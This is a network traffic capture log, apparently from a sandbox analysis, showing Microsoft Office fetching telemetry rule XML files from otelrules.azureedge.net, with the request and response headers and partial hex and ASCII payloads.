                                                          2024-12-02 16:56:43 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          97192.168.2.44985513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:43 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:44 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:43 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 2592
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                          ETag: "0x8DC582BB5B890DB"
                                                          x-ms-request-id: db283756-601e-0070-61b4-43a0c9000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165643Z-174f78459684bddphC1EWRbht400000014fg000000009699
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:44 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          98192.168.2.44985613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:43 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:44 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:44 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 3342
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                          ETag: "0x8DC582B927E47E9"
                                                          x-ms-request-id: b8dd1d48-d01e-005a-01dc-437fd9000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165644Z-174f7845968jrjrxhC1EWRmmrs00000014y00000000037pg
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:44 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          99192.168.2.44985713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:44 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:44 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:44 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 2284
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                          ETag: "0x8DC582BCD58BEEE"
                                                          x-ms-request-id: a7f5da2f-b01e-0070-7a69-431cc0000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165644Z-174f7845968zgtf6hC1EWRqd8s0000000xk000000000unbp
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:44 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          100192.168.2.44985813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:44 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:45 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:44 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1393
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                          ETag: "0x8DC582BE3E55B6E"
                                                          x-ms-request-id: d2df421c-b01e-0021-5593-43cab7000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165644Z-174f7845968cdxdrhC1EWRg0en00000014pg00000000dgwb
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:45 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          101192.168.2.44985913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:45 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:46 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:45 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1356
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                          ETag: "0x8DC582BDC681E17"
                                                          x-ms-request-id: 5bb85073-401e-005b-22cf-439c0c000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165645Z-174f7845968nxc96hC1EWRspw800000014f000000000cbx9
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:46 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          102192.168.2.44986113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:46 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:46 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:46 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1356
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                          ETag: "0x8DC582BDF66E42D"
                                                          x-ms-request-id: c2b00c79-201e-0000-27b2-42a537000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165646Z-174f78459685726chC1EWRsnbg00000014w0000000000pgp
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:46 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          103192.168.2.44986013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:46 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:46 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:46 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1393
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                          ETag: "0x8DC582BE39DFC9B"
                                                          x-ms-request-id: 4793f8bc-701e-0053-5872-433a0a000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165646Z-174f7845968pf68xhC1EWRr4h800000014w000000000rye8
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:46 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          104192.168.2.44986213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:46 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:47 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:46 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1395
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                          ETag: "0x8DC582BE017CAD3"
                                                          x-ms-request-id: 47663499-e01e-0051-6891-3f84b2000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165646Z-174f7845968xr5c2hC1EWRd0hn0000000pg000000000nc3r
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:47 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          105192.168.2.44986313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:46 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:47 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:47 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1358
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                          ETag: "0x8DC582BE6431446"
                                                          x-ms-request-id: 00f8033d-001e-000b-2543-4415a7000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165647Z-174f7845968cpnpfhC1EWR3afc000000147g00000000srtq
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:47 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          106192.168.2.44986413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:48 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:48 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:48 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1395
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                          ETag: "0x8DC582BDE12A98D"
                                                          x-ms-request-id: 7e8f62d2-801e-0047-4379-407265000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165648Z-174f78459685m244hC1EWRgp2c00000014fg00000000p0y3
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:48 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          107192.168.2.44986513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:48 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:48 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:48 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1358
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                          ETag: "0x8DC582BE022ECC5"
                                                          x-ms-request-id: 73839456-501e-000a-0a63-430180000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165648Z-174f78459685m244hC1EWRgp2c00000014fg00000000p0yb
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
